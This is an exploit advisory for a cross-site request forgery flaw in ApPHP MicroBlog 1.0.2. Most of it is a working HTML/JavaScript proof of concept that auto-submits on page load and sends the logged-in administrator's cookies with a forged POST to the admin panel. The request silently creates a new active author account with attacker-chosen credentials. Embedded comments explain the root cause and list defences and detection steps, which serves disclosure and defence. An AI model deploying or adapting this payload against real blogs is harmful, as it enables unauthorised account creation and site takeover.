
ApPHP MicroBlog 1.0.2 Cross Site Request Forgery

Posted on 13 October 2016

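# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162

########################### CSRF PoC ###############################

<html>
<body>
<!--
  Root cause, as far as this listing shows: the author-creation POST to
  index.php?admin=authors_management is built entirely from values a third
  party can predict. None of the form fields below is a per-session or
  per-request token, so the server presumably has no way to tell a request
  the administrator intended from one issued by another site in the
  administrator's browser.

  Defensive checks for this endpoint:
    - require an unpredictable anti-CSRF token bound to the admin session on
      every state-changing admin request and reject the request without it;
    - set the session cookie with SameSite=Lax or SameSite=Strict;
    - validate the Origin / Referer header against the blog's own host.
  For detection, look in web-server logs for POSTs to authors_management
  whose Origin or Referer is not the blog itself, and audit the author list
  for accounts nobody created on purpose.

  NOTE(review): the advisory dates from 2016. Browsers that default cookies
  to SameSite=Lax would not attach the session cookie to this cross-site
  POST unless the application sets SameSite=None; confirm how the session
  cookie is issued before relying on that.
-->
<script>
  /**
   * Sends one cross-origin multipart/form-data POST that mirrors the
   * "add author" form of the admin panel. The response cannot be read by
   * the calling page; the state change on the server is the whole effect.
   */
  function submitRequest()
  {
    var xhr = new XMLHttpRequest();
    // Placeholder target from the advisory; the query string selects the
    // admin "authors management" action.
    xhr.open("POST", " http://site_name/path/index.php?admin=authors_management", true);
    // Accept, Accept-Language and a multipart/form-data Content-Type are all
    // CORS-safelisted, so the browser sends this request without a preflight.
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------25472311920733601781889948655");
    // Ask the browser to attach the cookies it holds for the target origin
    // (subject to the cookie's SameSite policy).
    xhr.withCredentials = true;

    // Hand-built multipart body. Parts are separated by the boundary and
    // every line ends in CRLF, as multipart/form-data requires.
    var body =
      // Grid-control fields of the admin list view: action "create", no row id.
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_action\"\r\n" +
      "\r\n" +
      "create\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_rid\"\r\n" +
      "\r\n" +
      "-1\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_sorting_fields\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_sorting_types\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_page\"\r\n" +
      "\r\n" +
      "1\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_operation\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_operation_type\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_operation_field\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_search_status\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"mg_language_id\"\r\n" +
      "\r\n" +
      "\r\n" +
      // Fields of the new author record. All values are fixed sample data
      // chosen by the advisory's author; none is a secret or a token.
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"show_about_me\"\r\n" +
      "\r\n" +
      "0\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"account_type\"\r\n" +
      "\r\n" +
      "author\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"last_login\"\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"first_name\"\r\n" +
      "\r\n" +
      "Mehmet\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"last_name\"\r\n" +
      "\r\n" +
      "mersin\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"email\"\r\n" +
      "\r\n" +
      "mehmet@yopmail.com\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"user_name\"\r\n" +
      "\r\n" +
      "Zer0\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"password\"\r\n" +
      "\r\n" +
      "mehmet\r\n" +
      // Empty file part: the avatar upload field is submitted with no file.
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"avatar\"; filename=\"\"\r\n" +
      "Content-Type: application/octet-stream\r\n" +
      "\r\n" +
      "\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"about_me\"\r\n" +
      "\r\n" +
      "denemddendemdendjendk\r\n" +
      "-----------------------------25472311920733601781889948655\r\n" +
      "Content-Disposition: form-data; name=\"is_active\"\r\n" +
      "\r\n" +
      "1\r\n" +
      "-----------------------------25472311920733601781889948655--\r\n";

    // Copy the string into raw bytes and send it as a Blob so the body goes
    // out byte-for-byte under the Content-Type header set above.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
      aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
  }
  // Fires as soon as the page is parsed; no user interaction is needed.
  submitRequest();
</script>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

####################################################################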

 
